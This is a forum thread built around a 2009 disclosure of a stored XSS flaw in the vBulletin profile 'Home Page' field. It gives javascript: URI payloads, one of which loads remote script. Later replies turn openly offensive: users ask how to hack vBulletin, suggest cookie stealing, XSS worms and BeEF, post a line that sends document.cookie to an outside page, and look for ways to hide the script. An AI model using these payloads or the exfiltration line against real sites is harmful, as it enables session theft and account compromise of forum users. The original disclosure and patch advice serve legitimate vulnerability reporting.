» vBulletin 3.8.4 - Cross Site Script Redirection

[MaXe]

vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

References:
http://www.vbulletin.com/forum/showthread.php?t=319572


The Advisory

Quote:

The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to html entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes " .. The other
characters like < will become &lt; which is %3C which is almost the same.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.write('<script>alert(0)</script>')

The following scheme is a Proof of Concept that external Javascript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)

Solution
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1


Conclusion
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.


All of the best,
MaXe

[System]

O_O shweet find! lol

/pwn going around everywhere

[zero]

so ?
how to hack vbulletin?? :D

[Norph]

Read the post. The version of vBulleting is vulnerable to XSS.
Read up on XSS. ;)

[zero]

what we can do with XSS ?
just cookie stealer or else?

[ccoder]

cookie stealing and sesson hijacking are the most dangerous one !

but there are more ! like coding xss worm , or making ddos by persistance xss !

also there are some powerfull tools like BeEF .

google it ;)

[Neo139]

I was checking this bug and even if we use a js file with a code like
window.location="http://yourpage.com/bob.php?q="+document.cookie;
it will only send bblastvisit=value1; bblastactivity=value2
because bbsessionhash cookie is sent by vbulletin as HttpOnly. We can't access to it through clientside (tested with FF 3.6.4 and IE 6.0)

[MaXe]

Quote:

Originally Posted by Neo139

I was checking this bug and even if we use a js file with a code like
window.location="http://yourpage.com/bob.php?q="+document.cookie;
it will only send bblastvisit=value1; bblastactivity=value2
because bbsessionhash cookie is sent by vbulletin as HttpOnly. We can't access to it through clientside (tested with FF 3.6.4 and IE 6.0)

That doesn't necessarily mean that you cannot hack a user though

Thanks for the information though :)

[Neo139]

Quote:

Originally Posted by MaXe

That doesn't necessarily mean that you cannot hack a user though

Thanks for the information though :)

what can we do? give me ideas =P

it also works in vBulletin® Version 3.7.5

[Watermagician]

Yes, a hint would be nice =) I have the same problem =/

EDIT: I found a solution :) Just need to hide the javascript somehow =/